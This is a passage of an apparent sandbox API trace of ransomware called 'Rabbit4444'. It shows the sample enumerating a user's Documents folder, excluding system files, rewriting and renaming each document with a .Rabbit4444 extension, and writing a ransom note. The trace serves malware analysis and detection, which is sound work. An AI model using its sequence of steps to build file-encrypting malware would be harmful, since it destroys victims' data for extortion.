ftLastAccessTime.dwHighDateTime=0x1d4fb80, ftLastWriteTime.dwLowDateTime=0x94582fa0, ftLastWriteTime.dwHighDateTime=0x1d4fb80, nFileSizeHigh=0x0, nFileSizeLow=0x7257, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PRU9 H0QOwabp888.pptx", cAlternateFileName="PRU9H0~1.PPT")) returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="Rabbit4444.exe") returned -1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2=".") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="..") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="windows") returned -1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="bootmgr") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="pagefile.sys") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="boot") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="ids.txt") returned 1 [0049.593] lstrcmpiW (lpString1="PRU9 H0QOwabp888.pptx", lpString2="NTUSER.DAT") returned 1 [0049.593] lstrcpyW (in: lpString1=0x130eb6c, lpString2="PRU9 H0QOwabp888.pptx" | out: lpString1="PRU9 H0QOwabp888.pptx") returned="PRU9 H0QOwabp888.pptx" [0049.593] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\PRU9 H0QOwabp888.pptx", dwFileAttributes=0x0) returned 1 [0049.593] lstrlenW (lpString="PRU9 H0QOwabp888.pptx") returned 21 [0049.593] lstrlenW (lpString="Rabbit4444") returned 10 [0049.593] lstrcmpiW (lpString1="bp888.pptx", lpString2="Rabbit4444") returned -1 [0049.593] lstrlenW (lpString=".dll") returned 4 [0049.593] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.593] lstrlenW (lpString=".lnk") returned 4 [0049.593] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.593] lstrlenW (lpString=".ini") returned 4 [0049.593] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.594] lstrlenW (lpString=".sys") returned 4 [0049.594] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.594] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\PRU9 H0QOwabp888.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\pru9 h0qowabp888.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.594] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.594] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14090448743) returned 1 [0049.594] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=29271) returned 1 [0049.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0049.594] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7560, lpName=0x0) returned 0x298 [0049.594] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7560) returned 0x70000 [0049.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.595] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.595] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.595] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.595] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.595] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14090615676) returned 1 [0049.595] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.595] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0049.596] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.596] CloseHandle (hObject=0x298) returned 1 [0049.596] CloseHandle (hObject=0x278) returned 1 [0049.597] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\PRU9 H0QOwabp888.pptx.Rabbit4444") returned 58 [0049.597] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\PRU9 H0QOwabp888.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\pru9 h0qowabp888.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\PRU9 H0QOwabp888.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\pru9 h0qowabp888.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0049.597] InterlockedExchangeAdd (in: Addend=0xff618, Value=29280 | out: Addend=0xff618) returned 22421136 [0049.597] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3627 [0049.597] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d40a010, ftCreationTime.dwHighDateTime=0x1d4fda5, ftLastAccessTime.dwLowDateTime=0x56acd510, ftLastAccessTime.dwHighDateTime=0x1d52f89, ftLastWriteTime.dwLowDateTime=0x56acd510, ftLastWriteTime.dwHighDateTime=0x1d52f89, nFileSizeHigh=0x0, nFileSizeLow=0x101f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="suKaNdk0NBwOysu cjX.xlsx", cAlternateFileName="SUKAND~1.XLS")) returned 1 [0049.597] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.597] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.597] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="Rabbit4444.exe") returned 1 [0049.597] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2=".") returned 1 [0049.597] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="..") returned 1 [0049.598] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="windows") returned -1 [0049.598] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="bootmgr") returned 1 [0049.598] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="pagefile.sys") returned 1 [0049.598] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="boot") returned 1 [0049.598] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="ids.txt") returned 1 [0049.598] lstrcmpiW (lpString1="suKaNdk0NBwOysu cjX.xlsx", lpString2="NTUSER.DAT") returned 1 [0049.598] lstrcpyW (in: lpString1=0x130eb6c, lpString2="suKaNdk0NBwOysu cjX.xlsx" | out: lpString1="suKaNdk0NBwOysu cjX.xlsx") returned="suKaNdk0NBwOysu cjX.xlsx" [0049.598] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\suKaNdk0NBwOysu cjX.xlsx", dwFileAttributes=0x0) returned 1 [0049.598] lstrlenW (lpString="suKaNdk0NBwOysu cjX.xlsx") returned 24 [0049.598] lstrlenW (lpString="Rabbit4444") returned 10 [0049.598] lstrcmpiW (lpString1="u cjX.xlsx", lpString2="Rabbit4444") returned 1 [0049.598] lstrlenW (lpString=".dll") returned 4 [0049.598] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0049.598] lstrlenW (lpString=".lnk") returned 4 [0049.598] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0049.598] lstrlenW (lpString=".ini") returned 4 [0049.598] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0049.598] lstrlenW (lpString=".sys") returned 4 [0049.598] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0049.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\suKaNdk0NBwOysu cjX.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\sukandk0nbwoysu cjx.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.598] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.598] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14090914971) returned 1 [0049.598] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66032) returned 1 [0049.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0049.599] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x104f0, lpName=0x0) returned 0x298 [0049.599] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x104f0) returned 0x70000 [0049.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.600] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.601] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14091154141) returned 1 [0049.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0049.601] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.602] CloseHandle (hObject=0x298) returned 1 [0049.602] CloseHandle (hObject=0x278) returned 1 [0049.602] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\suKaNdk0NBwOysu cjX.xlsx.Rabbit4444") returned 61 [0049.602] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\suKaNdk0NBwOysu cjX.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\sukandk0nbwoysu cjx.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\suKaNdk0NBwOysu cjX.xlsx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\sukandk0nbwoysu cjx.xlsx.rabbit4444"), dwFlags=0x1) returned 1 [0049.603] InterlockedExchangeAdd (in: Addend=0xff618, Value=66032 | out: Addend=0xff618) returned 22450416 [0049.603] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3628 [0049.603] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefadf6d0, ftCreationTime.dwHighDateTime=0x1d4c617, ftLastAccessTime.dwLowDateTime=0xc4f07910, ftLastAccessTime.dwHighDateTime=0x1d4ccc3, ftLastWriteTime.dwLowDateTime=0xc4f07910, ftLastWriteTime.dwHighDateTime=0x1d4ccc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u-1JZ4Ru824_HpbNp", cAlternateFileName="U-1JZ4~1")) returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="Rabbit4444.exe") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2=".") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="..") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="windows") returned -1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="bootmgr") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="pagefile.sys") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="boot") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="ids.txt") returned 1 [0049.603] lstrcmpiW (lpString1="u-1JZ4Ru824_HpbNp", lpString2="NTUSER.DAT") returned 1 [0049.603] lstrcpyW (in: lpString1=0x130eb6c, lpString2="u-1JZ4Ru824_HpbNp" | out: lpString1="u-1JZ4Ru824_HpbNp") returned="u-1JZ4Ru824_HpbNp" [0049.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0049.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x58) returned 0x115748 [0049.603] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6430 [0049.603] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc303b5d0, ftCreationTime.dwHighDateTime=0x1d4f276, ftLastAccessTime.dwLowDateTime=0xb11a22d0, ftLastAccessTime.dwHighDateTime=0x1d4bc2c, ftLastWriteTime.dwLowDateTime=0xb11a22d0, ftLastWriteTime.dwHighDateTime=0x1d4bc2c, nFileSizeHigh=0x0, nFileSizeLow=0x1ba2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xT4l_ROJLA_IpK4d4.docx", cAlternateFileName="XT4L_R~1.DOC")) returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="Rabbit4444.exe") returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2=".") returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="..") returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="windows") returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="bootmgr") returned 1 [0049.603] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="pagefile.sys") returned 1 [0049.604] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="boot") returned 1 [0049.604] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="ids.txt") returned 1 [0049.604] lstrcmpiW (lpString1="xT4l_ROJLA_IpK4d4.docx", lpString2="NTUSER.DAT") returned 1 [0049.604] lstrcpyW (in: lpString1=0x130eb6c, lpString2="xT4l_ROJLA_IpK4d4.docx" | out: lpString1="xT4l_ROJLA_IpK4d4.docx") returned="xT4l_ROJLA_IpK4d4.docx" [0049.604] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\xT4l_ROJLA_IpK4d4.docx", dwFileAttributes=0x0) returned 1 [0049.604] lstrlenW (lpString="xT4l_ROJLA_IpK4d4.docx") returned 22 [0049.604] lstrlenW (lpString="Rabbit4444") returned 10 [0049.604] lstrcmpiW (lpString1="pK4d4.docx", lpString2="Rabbit4444") returned -1 [0049.604] lstrlenW (lpString=".dll") returned 4 [0049.604] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.604] lstrlenW (lpString=".lnk") returned 4 [0049.604] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.604] lstrlenW (lpString=".ini") returned 4 [0049.604] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.604] lstrlenW (lpString=".sys") returned 4 [0049.604] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0049.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\xT4l_ROJLA_IpK4d4.docx" (normalized: "c:\\users\\fd1hvy\\documents\\xt4l_rojla_ipk4d4.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.604] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.604] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14091504450) returned 1 [0049.604] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7074) returned 1 [0049.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0049.604] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1eb0, lpName=0x0) returned 0x298 [0049.605] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1eb0) returned 0x70000 [0049.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.606] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14091627861) returned 1 [0049.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0049.606] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.606] CloseHandle (hObject=0x298) returned 1 [0049.606] CloseHandle (hObject=0x278) returned 1 [0049.606] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\xT4l_ROJLA_IpK4d4.docx.Rabbit4444") returned 59 [0049.606] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\xT4l_ROJLA_IpK4d4.docx" (normalized: "c:\\users\\fd1hvy\\documents\\xt4l_rojla_ipk4d4.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\xT4l_ROJLA_IpK4d4.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\xt4l_rojla_ipk4d4.docx.rabbit4444"), dwFlags=0x1) returned 1 [0049.607] InterlockedExchangeAdd (in: Addend=0xff618, Value=7088 | out: Addend=0xff618) returned 22516448 [0049.607] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3630 [0049.607] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc303b5d0, ftCreationTime.dwHighDateTime=0x1d4f276, ftLastAccessTime.dwLowDateTime=0xb11a22d0, ftLastAccessTime.dwHighDateTime=0x1d4bc2c, ftLastWriteTime.dwLowDateTime=0xb11a22d0, ftLastWriteTime.dwHighDateTime=0x1d4bc2c, nFileSizeHigh=0x0, nFileSizeLow=0x1ba2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xT4l_ROJLA_IpK4d4.docx", cAlternateFileName="XT4L_R~1.DOC")) returned 0 [0049.607] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0049.607] lstrcpyW (in: lpString1=0x130eb6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.608] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.608] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.609] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.609] CloseHandle (hObject=0x278) returned 1 [0049.609] CloseHandle (hObject=0x27c) returned 1 [0049.609] GetCurrentThreadId () returned 0xd98 [0049.609] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0049.609] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp" [0049.609] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115748 | out: hHeap=0xe0000) returned 1 [0049.609] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0049.609] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp" [0049.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\" [0049.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\.BFC0E91B00AE8A0620D3" [0049.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.612] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.615] FlushFileBuffers (hFile=0x27c) returned 1 [0049.617] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.617] CloseHandle (hObject=0x27c) returned 1 [0049.617] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp") returned 43 [0049.618] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.618] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefadf6d0, ftCreationTime.dwHighDateTime=0x1d4c617, ftLastAccessTime.dwLowDateTime=0xc4f07910, ftLastAccessTime.dwHighDateTime=0x1d4ccc3, ftLastWriteTime.dwLowDateTime=0xe6e5f51b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0049.618] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.618] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.618] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.618] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.618] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefadf6d0, ftCreationTime.dwHighDateTime=0x1d4c617, ftLastAccessTime.dwLowDateTime=0xc4f07910, ftLastAccessTime.dwHighDateTime=0x1d4ccc3, ftLastWriteTime.dwLowDateTime=0xe6e5f51b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.618] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.618] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.618] lstrcmpiW 